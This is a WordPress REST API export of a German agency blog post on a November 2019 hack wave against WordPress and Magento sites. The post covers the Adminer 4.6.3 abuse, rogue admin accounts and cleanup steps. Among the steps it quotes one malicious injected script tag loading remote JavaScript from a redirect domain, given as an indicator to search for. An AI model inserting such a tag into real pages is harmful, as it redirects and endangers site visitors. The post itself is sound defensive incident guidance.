{"id":1553,"date":"2019-11-19T17:59:27","date_gmt":"2019-11-19T16:59:27","guid":{"rendered":"https:\/\/www.melon-media.de\/blog\/?p=1553"},"modified":"2019-11-21T06:15:59","modified_gmt":"2019-11-21T05:15:59","slug":"wordpress-hack-welle-weiterleitung-auf-unserioese-webseiten","status":"publish","type":"post","link":"https:\/\/www.melon-media.de\/blog\/wordpress-hack-welle-weiterleitung-auf-unserioese-webseiten\/","title":{"rendered":"WordPress Hack-Welle: Redirect auf unseri\u00f6se Webseiten"},"content":{"rendered":"<p>Aus aktuellem Anlass: In den letzten Tagen bekommen wir vermehrt R\u00fcckmeldungen, dass Websites mit WordPress, aber auch Magento, gehackt worden sind. Eine regelrechte Hack-Welle hat sich innerhalb k\u00fcrzester Zeit auf WordPress und Magento Systemen ausgebreitet. In den konkreten F\u00e4llen sind alle Beitragstypen &#8211; wie Beitr\u00e4ge, Produkte oder Seiten &#8211; nach dem Angriff mit einem JavaScript-Aufruf modifiziert worden. Als Ergebnis werden Besucher der Website auf Gewinnspiel-Seiten oder \u00e4hnliche unseri\u00f6se Inhalte weitergeleitet. H\u00e4ufig befindet sich der Schadcode seit l\u00e4ngerem auf den Websites unentdeckt. Dieser ist aber seit dem 11.11.2019 auf den infizierten Websites vermehrt ausgef\u00fchrt worden.<\/p>\n<p><!--more--><\/p>\n<div><\/div>\n<div>\n<figure id=\"attachment_958\" aria-describedby=\"caption-attachment-958\" style=\"width: 300px\" class=\"wp-caption alignleft\"><a href=\"https:\/\/www.melon-media.de\/blog\/wp-content\/uploads\/2016\/09\/security.jpg\"  rel=\"lightbox[roadtrip]\"><img loading=\"lazy\" class=\"wp-image-958 size-medium\" src=\"https:\/\/www.melon-media.de\/blog\/wp-content\/uploads\/2016\/09\/security-300x178.jpg\" alt=\"WordPress Sicherheit\" width=\"300\" height=\"178\" srcset=\"https:\/\/www.melon-media.de\/blog\/wp-content\/uploads\/2016\/09\/security-300x178.jpg 300w, https:\/\/www.melon-media.de\/blog\/wp-content\/uploads\/2016\/09\/security.jpg 567w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><figcaption id=\"caption-attachment-958\" class=\"wp-caption-text\">Eine Hack-Welle im November 2019 hat einen Gro\u00dfteil der WordPress Community aufgeschreckt<\/figcaption><\/figure>\n<p>Zunehmend wird diese Hack-Welle im November im Internet diskutiert. Die Tragweite der Angriffe zeigt sich bei genauerer Betrachtung der Vorf\u00e4lle. Neben dem Einschleusen hunderter infizierter JS-Dateien, hinterlassen die Hacker auch andere &#8222;Geschenke&#8220; in Form von infizierten Datenbanken. Am Beispiel von WordPress sind die Tabellen wp_options und wp_posts ver\u00e4ndert worden.<\/p>\n<\/div>\n<div><\/div>\n<div>\n<div>Wie \u00fcblich reicht es den Hackern nicht, b\u00f6sartigen Code einzuspeisen oder Datenbanken zu manuipulieren. In einigen F\u00e4llen versuchten sie auch den Zugriff auf kompromittierte Websites zu behalten oder bequemere M\u00f6glichkeiten zu schaffen auf diesen zu arbeiten.<\/div>\n<div><\/div>\n<div>Der Sicherheitsanbieter Sucuri schreibt in einem aktuellen Beitrag zu der <a href=\"https:\/\/blog.sucuri.net\/2019\/11\/vulnerable-versions-of-adminer-as-a-universal-infection-vector.html\" target=\"_blank\" rel=\"noopener noreferrer\">November Hack-Welle<\/a> folgendes: \u201cIm Falle dieses Angriffs finden wir in der Regel neue b\u00f6sartige WordPress-Administratoren, welche der Tabelle wp_users der Datenbank hinzugef\u00fcgt worden sind. Diese gef\u00e4lschten Admins helfen den Angreifern, unbefugten Zugriff auf die gef\u00e4hrdeten Umgebungen zu erhalten und bestimmte \u00c4nderungen vorzunehmen.\u201d In den WordPress Installationen unserer Kunden konnten wir beispielsweise neue Benutzer, wie \u201cservice\u201d oder \u201cbencraftrocher\u201d, entdecken.<\/div>\n<div><\/div>\n<h2>Hack-Welle: Wie konnte das passieren?<\/h2>\n<div>Software ist nie fehlerfrei. Das Gleiche gilt nat\u00fcrlich auch f\u00fcr Redaktions- bzw. Shop-systeme, wie WordPress oder Magento. Im aktuellen Fall haben Hacker vermutlich es geschafft, entweder die bereits vorhandene adminer.php, die Teil des Plugins Adminer ist, zu missbrauchen oder sogar durch eine weitere Sicherheitsl\u00fccke diese auf den Server hochzuladen. Zumindest ist bekannt, dass das Plugin Adminer in der veralteten Version 4.6.3 Zugriff auf den Server erlaubte und so die Anweisung LOAD DATA LOCAL INFILE ausf\u00fchren konnte. Ist die Datei adminer.php in dieser veralteten Version erst einmal auf dem Server, ist die Modifikation der Website bzw. der Datenbank m\u00f6glich.<\/div>\n<figure id=\"attachment_1562\" aria-describedby=\"caption-attachment-1562\" style=\"width: 300px\" class=\"wp-caption alignright\"><a href=\"https:\/\/www.melon-media.de\/blog\/wp-content\/uploads\/2019\/11\/malware-welle-wordpress.png\"  rel=\"lightbox[roadtrip]\"><img loading=\"lazy\" class=\"size-medium wp-image-1562\" src=\"https:\/\/www.melon-media.de\/blog\/wp-content\/uploads\/2019\/11\/malware-welle-wordpress-300x197.png\" alt=\"Malware Weiterleitung in WordPress\" width=\"300\" height=\"197\" srcset=\"https:\/\/www.melon-media.de\/blog\/wp-content\/uploads\/2019\/11\/malware-welle-wordpress-300x197.png 300w, https:\/\/www.melon-media.de\/blog\/wp-content\/uploads\/2019\/11\/malware-welle-wordpress.png 850w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><figcaption id=\"caption-attachment-1562\" class=\"wp-caption-text\">Auf solche oder \u00e4hnliche Seiten wird weitergeleitet, wenn ein Malware Angriff erfolgte<\/figcaption><\/figure>\n<div><\/div>\n<h2>Was ist zu tun?<\/h2>\n<div>Ausgehend von unseren Erfahrungen in solchen F\u00e4llen, m\u00f6chten wir hier gerne ein paar Anhaltspunkte zusammenstellen, die euch helfen sollen eure Situation besser einzusch\u00e4tzen.<\/div>\n<div><\/div>\n<div>Bei solchen Hacking-Angriffen, ist es erstmal wichtig, Ruhe zu bewahren. Verifiziere zun\u00e4chst, ob Deine Website wirklich von einem Angriff betroffen ist oder vielleicht ein anderes technisches Problem vorliegt. Eine solche Pr\u00fcfung empfehlen wir mit dem <a href=\"https:\/\/sitecheck.sucuri.net\/\" target=\"_blank\" rel=\"noopener noreferrer\">Sucuri Sitechecker<\/a> durchzuf\u00fchren. Sollte dieser Test positiv sein, empfehlen wir folgende Schritte durchzuf\u00fchren.<\/div>\n<\/div>\n<div>\n<ol>\n<li>Entferne die folgenden infekti\u00f6sen Dateien:\n<ol>\n<li>Adminer.php befindet sich im root<\/li>\n<li>Entferne die Datei wp-content\/plugins\/super-socialat\/super_socialat.php<\/li>\n<\/ol>\n<\/li>\n<li>Bereinige die Datenbank und halte Ausschau nach z.B. folgenden Skripten:\n<ol>\n<li>&lt;script src=&#8217;https:\/\/land.buyittraffic.com\/clizkes&#8216; type=&#8217;text\/javascript&#8216;&gt;&lt;\/script&gt;<\/li>\n<\/ol>\n<\/li>\n<li>\u00c4ndere das Datenbank-Passwort<\/li>\n<li>Lege neue FTP\/SSH Passw\u00f6rter fest<\/li>\n<li>Passw\u00f6rter von WordPress Admin-Usern (die bekannt sind) sollten ebenfalls ge\u00e4ndert<\/li>\n<li>Nicht genutzte WordPress User entfernen<\/li>\n<li>Wenn es keine Sicherheitskopie Deiner Website gibt, dann ist jetzt der Zeitpunkt eine solche zu erstellen.<\/li>\n<\/ol>\n<h2>Du brauchst Hilfe?<\/h2>\n<p>Solltest Du Hilfe ben\u00f6tigen, um Deine WordPress Website zu bereinigen, dann setze Dich <a href=\"https:\/\/www.melon-media.de\/kontakt\/\">gerne mit uns in Verbindung<\/a>. Wir versuchen Dir dann schnell und unkompliziert zu helfen.<\/p>\n<div><\/div>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>Aus aktuellem Anlass: In den letzten Tagen bekommen wir vermehrt R\u00fcckmeldungen, dass Websites mit WordPress, aber auch Magento, gehackt worden sind. Eine regelrechte Hack-Welle hat sich innerhalb k\u00fcrzester Zeit auf WordPress und Magento Systemen ausgebreitet. In den konkreten F\u00e4llen sind alle Beitragstypen &#8211; wie Beitr\u00e4ge, Produkte oder Seiten &#8211; nach dem Angriff mit einem JavaScript-Aufruf [&hellip;]<\/p>\n","protected":false},"author":8,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_genesis_hide_title":false,"_genesis_hide_breadcrumbs":false,"_genesis_hide_singular_image":false,"_genesis_hide_footer_widgets":false,"_genesis_custom_body_class":"","_genesis_custom_post_class":"","_genesis_layout":""},"categories":[81],"tags":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v15.9.2 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>WordPress Hack-Welle: Redirect auf unseri\u00f6se Webseiten - melon|media Blog<\/title>\n<meta name=\"description\" content=\"Im November 2019 ist WordPress durch eine Hack-Welle betroffen worden, wir kl\u00e4ren in diesem Artikel auf, was ihr in solchen F\u00e4llen tun k\u00f6nnt.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.melon-media.de\/blog\/wordpress-hack-welle-weiterleitung-auf-unserioese-webseiten\/\" \/>\n<meta property=\"og:locale\" content=\"de_DE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"WordPress Hack-Welle: Redirect auf unseri\u00f6se Webseiten - melon|media Blog\" \/>\n<meta property=\"og:description\" content=\"Im November 2019 ist WordPress durch eine Hack-Welle betroffen worden, wir kl\u00e4ren in diesem Artikel auf, was ihr in solchen F\u00e4llen tun k\u00f6nnt.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.melon-media.de\/blog\/wordpress-hack-welle-weiterleitung-auf-unserioese-webseiten\/\" \/>\n<meta property=\"og:site_name\" content=\"melon|media Blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/melonmedia\" \/>\n<meta property=\"article:published_time\" content=\"2019-11-19T16:59:27+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2019-11-21T05:15:59+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.melon-media.de\/blog\/wp-content\/uploads\/2016\/09\/security-300x178.jpg\" \/>\n<meta name=\"twitter:card\" content=\"summary\" \/>\n<meta name=\"twitter:creator\" content=\"@melonmedia\" \/>\n<meta name=\"twitter:site\" content=\"@melonmedia\" \/>\n<meta name=\"twitter:label1\" content=\"Gesch\u00e4tzte Lesezeit\">\n\t<meta name=\"twitter:data1\" content=\"3\u00a0Minuten\">\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.melon-media.de\/blog\/#organization\",\"name\":\"melon|media\",\"url\":\"https:\/\/www.melon-media.de\/blog\/\",\"sameAs\":[\"https:\/\/www.facebook.com\/melonmedia\",\"https:\/\/twitter.com\/melonmedia\"],\"logo\":{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/www.melon-media.de\/blog\/#logo\",\"inLanguage\":\"de\",\"url\":\"https:\/\/www.melon-media.de\/blog\/wp-content\/uploads\/2016\/01\/2L0JROF6.png\",\"width\":250,\"height\":250,\"caption\":\"melon|media\"},\"image\":{\"@id\":\"https:\/\/www.melon-media.de\/blog\/#logo\"}},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.melon-media.de\/blog\/#website\",\"url\":\"https:\/\/www.melon-media.de\/blog\/\",\"name\":\"melon|media Blog\",\"description\":\"TYPO3 und Online-Marketing aus Hamburg\",\"publisher\":{\"@id\":\"https:\/\/www.melon-media.de\/blog\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":\"https:\/\/www.melon-media.de\/blog\/?s={search_term_string}\",\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"de\"},{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/www.melon-media.de\/blog\/wordpress-hack-welle-weiterleitung-auf-unserioese-webseiten\/#primaryimage\",\"inLanguage\":\"de\",\"url\":\"https:\/\/www.melon-media.de\/blog\/wp-content\/uploads\/2016\/09\/security.jpg\",\"width\":567,\"height\":336,\"caption\":\"TYPO3 Security\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.melon-media.de\/blog\/wordpress-hack-welle-weiterleitung-auf-unserioese-webseiten\/#webpage\",\"url\":\"https:\/\/www.melon-media.de\/blog\/wordpress-hack-welle-weiterleitung-auf-unserioese-webseiten\/\",\"name\":\"WordPress Hack-Welle: Redirect auf unseri\\u00f6se Webseiten - melon|media Blog\",\"isPartOf\":{\"@id\":\"https:\/\/www.melon-media.de\/blog\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.melon-media.de\/blog\/wordpress-hack-welle-weiterleitung-auf-unserioese-webseiten\/#primaryimage\"},\"datePublished\":\"2019-11-19T16:59:27+00:00\",\"dateModified\":\"2019-11-21T05:15:59+00:00\",\"description\":\"Im November 2019 ist WordPress durch eine Hack-Welle betroffen worden, wir kl\\u00e4ren in diesem Artikel auf, was ihr in solchen F\\u00e4llen tun k\\u00f6nnt.\",\"breadcrumb\":{\"@id\":\"https:\/\/www.melon-media.de\/blog\/wordpress-hack-welle-weiterleitung-auf-unserioese-webseiten\/#breadcrumb\"},\"inLanguage\":\"de\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.melon-media.de\/blog\/wordpress-hack-welle-weiterleitung-auf-unserioese-webseiten\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.melon-media.de\/blog\/wordpress-hack-welle-weiterleitung-auf-unserioese-webseiten\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"item\":{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.melon-media.de\/blog\/\",\"url\":\"https:\/\/www.melon-media.de\/blog\/\",\"name\":\"Home\"}},{\"@type\":\"ListItem\",\"position\":2,\"item\":{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.melon-media.de\/blog\/wordpress-hack-welle-weiterleitung-auf-unserioese-webseiten\/\",\"url\":\"https:\/\/www.melon-media.de\/blog\/wordpress-hack-welle-weiterleitung-auf-unserioese-webseiten\/\",\"name\":\"WordPress Hack-Welle: Redirect auf unseri\\u00f6se Webseiten\"}}]},{\"@type\":\"Article\",\"@id\":\"https:\/\/www.melon-media.de\/blog\/wordpress-hack-welle-weiterleitung-auf-unserioese-webseiten\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.melon-media.de\/blog\/wordpress-hack-welle-weiterleitung-auf-unserioese-webseiten\/#webpage\"},\"author\":{\"@id\":\"https:\/\/www.melon-media.de\/blog\/#\/schema\/person\/abee9501380d2bc6bc77326084b2f983\"},\"headline\":\"WordPress Hack-Welle: Redirect auf unseri\\u00f6se Webseiten\",\"datePublished\":\"2019-11-19T16:59:27+00:00\",\"dateModified\":\"2019-11-21T05:15:59+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.melon-media.de\/blog\/wordpress-hack-welle-weiterleitung-auf-unserioese-webseiten\/#webpage\"},\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/www.melon-media.de\/blog\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.melon-media.de\/blog\/wordpress-hack-welle-weiterleitung-auf-unserioese-webseiten\/#primaryimage\"},\"articleSection\":\"WordPress\",\"inLanguage\":\"de\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/www.melon-media.de\/blog\/wordpress-hack-welle-weiterleitung-auf-unserioese-webseiten\/#respond\"]}]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.melon-media.de\/blog\/#\/schema\/person\/abee9501380d2bc6bc77326084b2f983\",\"name\":\"melonmedia Team\",\"image\":{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/www.melon-media.de\/blog\/#personlogo\",\"inLanguage\":\"de\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/330a87875b87208793e5210dd17cff4d?s=96&d=mm&r=g\",\"caption\":\"melonmedia Team\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","_links":{"self":[{"href":"https:\/\/www.melon-media.de\/blog\/wp-json\/wp\/v2\/posts\/1553"}],"collection":[{"href":"https:\/\/www.melon-media.de\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.melon-media.de\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.melon-media.de\/blog\/wp-json\/wp\/v2\/users\/8"}],"replies":[{"embeddable":true,"href":"https:\/\/www.melon-media.de\/blog\/wp-json\/wp\/v2\/comments?post=1553"}],"version-history":[{"count":11,"href":"https:\/\/www.melon-media.de\/blog\/wp-json\/wp\/v2\/posts\/1553\/revisions"}],"predecessor-version":[{"id":1565,"href":"https:\/\/www.melon-media.de\/blog\/wp-json\/wp\/v2\/posts\/1553\/revisions\/1565"}],"wp:attachment":[{"href":"https:\/\/www.melon-media.de\/blog\/wp-json\/wp\/v2\/media?parent=1553"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.melon-media.de\/blog\/wp-json\/wp\/v2\/categories?post=1553"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.melon-media.de\/blog\/wp-json\/wp\/v2\/tags?post=1553"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}